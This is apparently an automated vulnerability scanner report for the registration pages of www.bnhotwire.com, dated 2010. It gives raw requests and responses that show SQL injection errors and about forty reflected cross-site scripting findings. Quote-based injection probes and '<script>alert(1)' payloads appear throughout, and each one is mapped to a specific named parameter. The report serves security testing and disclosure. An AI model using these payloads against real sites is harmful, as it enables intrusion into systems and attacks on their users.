1.1. http://www.bnhotwire.com/register/confirm.asp [Postal_a parameter]
1.2. http://www.bnhotwire.com/register/confirm.asp [StationPhone_a parameter]
2. Cross-site scripting (reflected)
2.1. http://www.bnhotwire.com/register/confirm.asp [FirstName parameter]
2.2. http://www.bnhotwire.com/register/terms.asp [Address parameter]
2.3. http://www.bnhotwire.com/register/terms.asp [Address parameter]
2.4. http://www.bnhotwire.com/register/terms.asp [AirName parameter]
2.5. http://www.bnhotwire.com/register/terms.asp [AirName parameter]
2.6. http://www.bnhotwire.com/register/terms.asp [CallSign parameter]
2.7. http://www.bnhotwire.com/register/terms.asp [CallSign parameter]
2.8. http://www.bnhotwire.com/register/terms.asp [City parameter]
2.9. http://www.bnhotwire.com/register/terms.asp [City parameter]
2.10. http://www.bnhotwire.com/register/terms.asp [Email parameter]
2.11. http://www.bnhotwire.com/register/terms.asp [Email parameter]
2.12. http://www.bnhotwire.com/register/terms.asp [FirstName parameter]
2.13. http://www.bnhotwire.com/register/terms.asp [FirstName parameter]
2.14. http://www.bnhotwire.com/register/terms.asp [Format parameter]
2.15. http://www.bnhotwire.com/register/terms.asp [Format parameter]
2.16. http://www.bnhotwire.com/register/terms.asp [LastName parameter]
2.17. http://www.bnhotwire.com/register/terms.asp [LastName parameter]
2.18. http://www.bnhotwire.com/register/terms.asp [PROVINCE parameter]
2.19. http://www.bnhotwire.com/register/terms.asp [PROVINCE parameter]
2.20. http://www.bnhotwire.com/register/terms.asp [Phone_a parameter]
2.21. http://www.bnhotwire.com/register/terms.asp [Phone_a parameter]
2.22. http://www.bnhotwire.com/register/terms.asp [Phone_b parameter]
2.23. http://www.bnhotwire.com/register/terms.asp [Phone_b parameter]
2.24. http://www.bnhotwire.com/register/terms.asp [Phone_c parameter]
2.25. http://www.bnhotwire.com/register/terms.asp [Phone_c parameter]
2.26. http://www.bnhotwire.com/register/terms.asp [Phone_ext parameter]
2.27. http://www.bnhotwire.com/register/terms.asp [Phone_ext parameter]
2.28. http://www.bnhotwire.com/register/terms.asp [Postal_a parameter]
2.29. http://www.bnhotwire.com/register/terms.asp [Postal_a parameter]
2.30. http://www.bnhotwire.com/register/terms.asp [Postal_b parameter]
2.31. http://www.bnhotwire.com/register/terms.asp [Postal_b parameter]
2.32. http://www.bnhotwire.com/register/terms.asp [StationPhone_a parameter]
2.33. http://www.bnhotwire.com/register/terms.asp [StationPhone_a parameter]
2.34. http://www.bnhotwire.com/register/terms.asp [StationPhone_b parameter]
2.35. http://www.bnhotwire.com/register/terms.asp [StationPhone_b parameter]
2.36. http://www.bnhotwire.com/register/terms.asp [StationPhone_c parameter]
2.37. http://www.bnhotwire.com/register/terms.asp [StationPhone_c parameter]
2.38. http://www.bnhotwire.com/register/terms.asp [Title parameter]
2.39. http://www.bnhotwire.com/register/terms.asp [Title parameter]
3. Cookie without HttpOnly flag set
4.1. http://www.bnhotwire.com/content.asp
4.2. http://www.bnhotwire.com/register/confirm.asp
5. HTML does not specify charset
5.1. http://www.bnhotwire.com/
5.2. http://www.bnhotwire.com/register/
5.3. http://www.bnhotwire.com/register/confirm.asp
5.4. http://www.bnhotwire.com/register/terms.asp
5.5. http://www.bnhotwire.com/start.htm
Severity: | High |
Confidence: | Firm |
Host: | http://www.bnhotwire.com |
Path: | /register/confirm.asp |
POST /register/confirm.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 245 check_1=ON&B1=Submit |
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:50 GMT Content-Length: 4969 Content-Type: text/html Expires: Tue, 14 Dec 2010 16:13:51 GMT Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </sty ...[SNIP]... <br> Microsoft OLE DB Provider for ODBC Drivers (0x80040E21)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.bnhotwire.com |
Path: | /register/confirm.asp |
POST /register/confirm.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 245 check_1=ON&B1=Submit |
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:53 GMT Content-Length: 4969 Content-Type: text/html Expires: Tue, 14 Dec 2010 16:13:53 GMT Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </sty ...[SNIP]... <br> Microsoft OLE DB Provider for ODBC Drivers (0x80040E21)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/confirm.asp |
POST /register/confirm.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 245 check_1=ON&B1=Submit ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:12 GMT Content-Length: 3774 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <script language="JavaScript"> <!-- //CloseWindow function closeWindow() { ...[SNIP]... <font color="#000000">Thank you ''9717b<script>alert(1)< information is confirmed, you will be sent a password allowing you to enter the site. Please note, this may take up to three bus ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:02 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ''5cc7a<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:01 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Address" value= "''4da1f"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:51 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ''67b95<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:50 GMT Content-Length: 6637 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="AirName" value= "''fb82d"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:45 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="CallSign" value= "''1cabf"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:46 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ''ac88d<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:06 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="City" value= "''ba45c"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:08 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ''17f7a<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:20 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Email" value= "'a=a'--@\\/script.com524fc"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:21 GMT Content-Length: 6633 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: 'a=a'--@\\ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%2734420<script>alert(1)< ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:01 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ''34420<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%2792cc2"><script>alert(1)< ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:00 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="FirstName" value= "''92cc2"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:57 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ''bc256<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:55 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Format" value= "''e85a7"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:09 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="LastName" value= "''7574f"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:11 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: '' ''d5764<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:12 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ON6ea17<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:11 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Province" value= "ON89489"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:26 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Phone_a" value= "'5221d"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:27 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: '3df65<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
